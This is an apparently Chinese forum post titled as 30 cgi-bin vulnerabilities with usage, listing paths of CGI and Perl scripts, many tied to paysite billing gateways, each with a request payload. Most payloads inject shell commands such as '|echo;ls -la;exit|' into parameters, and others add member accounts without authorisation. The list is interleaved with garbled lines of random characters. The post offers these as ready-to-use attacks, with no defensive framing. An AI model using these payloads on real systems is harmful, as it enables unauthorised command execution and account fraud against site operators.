Cgi-bin 30个漏洞＋使用方法

admin

==============================
6 @7 N/ n& k% A% G) o, u. y/ j
, P: W" e0 h7 k0 E5 V/smspass.pl
$ ]: j' [# B  w/ h, ?1 eusername=username&password=password

8 ^0 Y  _* e# N" M! g( }/index.cgi
! g2 w6 ^0 G) p0 l/ q+ mwei=ren&gen=command
9 T( W' j9 \: J
6 x* _; K6 ?+ S0 [- \/passmaster.cgi
/ G2 i! C' e* q  QAction=Add&Username=Username&Password=Password
" `8 y( Z1 H; C" ?( L- g
" h9 m9 P* K6 M" h- J/accountcreate.cgi
. F+ j. g; W8 \4 ~; ]username=username&password=password&ref1=|echo;ls|
6 D6 d/ k& u* [! a3 n
* a: k7 b5 \0 m; J' g/form.cgi
' f# l" g+ ]) \- ]4 yname=xxxx&email=email&subject=xxxx&response=|echo;ls|

/addusr.pl
/cgi-bin/EuroDebit/addusr.pl
# p5 K; Y+ h' {3 g. z8 k9 Juser=username&pass=Password&confirm=Password
5 Y& `: E9 c: S- C3 P5 @$ Q8 u) u
/ccbill-local.asp
+ l% A: M  n( X: A" c% p5 F3 _. R( e6 Ppost_values=username:password

3 ?% u/ U: A5 N1 }$ S7 N/count.cgi
$ o+ x' w" R! _, Lpinfile=|echo;ls -la;exit|
7 F: `. ]9 l; D* j
% b! T8 s" g  J/recon.cgi
/recon.cgi?search
, P5 D& O3 b/ B7 x9 ]searchoption=1&searchfor=|echo;ls -al;exit|

/verotelrum.pl
vercode=username:password:dseegsow:add:amount<&30>
$ t! F9 S) @4 Y1 ~/ C- L
/af.cgi
_browser_out=|echo;ls -la;exit;|

! @& w9 u# |2 J% ]4 ?* s0 s* t3 ]/modify.cgi
, w4 E* [" |2 B  nusername=username&password=password&expire=30

' B. g( ^, V5 C$ r/openjournal.cgi
$ f+ U' S% ^3 q) _1 }  hedit=1&ct=2&go=|echo;ls -al;exit|
, u6 k+ a4 E, M, u1 o# L* a' @6 h
' t/ }9 \" S6 n0 r( ^/gx9passwd.cgi
5 B% l: X6 V5 _& M0 t  Q2 Ycmd=ADD&user=username&pass=password
5 U3 r8 M  @# Y
/probecontrol.cgi
command=enable&username=username&password=password

. Y+ {" R* ~, t& g  V/recon.cgi
searchoption=3&searchfor=echo;ls -la;exit
2 ]$ J1 M+ T4 q& w
! D  H& F; u: C  Q8 O/htadd.pl
configfile=|echo; ls -alt; exit

* J: n% X. o) {6 N" b6 k: f, m/gx9passwd.cgi
& J6 k7 P. g; n: o1 ccmd=ADD&user=username&pass=password
. m; F  B; I4 w5 c/ n: a
/ibill*.pl
reqtype=add&authpwd=authpwd&username=username&password=password
: A. O) n5 L% h
/cpay.cgi
% G! c( O4 D# w3 W& [command=add_member&username=username(EMAIL)&password=password(DES)
2 o: P* r: k" k, H6 G2 ]
/ o1 B6 W( Q# I+ E/globill_ut.cgi
do=add&username=username&password=password&wpassword=password
5 e: [* p+ `, s0 K& ~, ]
/usercontrol.cgi
command=enable&username=USER&password=PASS

/globoSALErum.cgi
action=ADD&seccode=seccode&login=username&password=password

/addusr.pl
user=USER&pass=PASS&confirm=PASS

/pincount.cgi
1 ~& ^8 N* ?( Q3 E$ ]/cgi-bin/mastergate/pincount.cgi
pinfile=|echo;pwd;exit|

/accountcreate.cgi
/cgi-bin/gateway/accountcreate.cgi
username=username&password=password&password2=password&ref1=|echo;ls -al;exit
! E/ d! C8 s* x+ F2 @$ {) P
3 t/ r) k( h& k) c6 t/af.cgi
/env.cgi
ADD+;echo;pwd;exit

  k8 k" K: b. h- W' w/count.cgi
pinfile=|echo;pwd;exit|

, q( X7 S8 E4 u2 b/ m; A  r/recon.cgi
searchoption=1&searchfor=|echo;ls%20-al;exit|

: ~1 ]1 R) s) ~/add.cgi
% S+ V5 G7 _* {username=username&password=password&expire=30

3 [! z2 N7 N* R* t0 B* v) B==============================
  g6 m& E& v# h# z3 z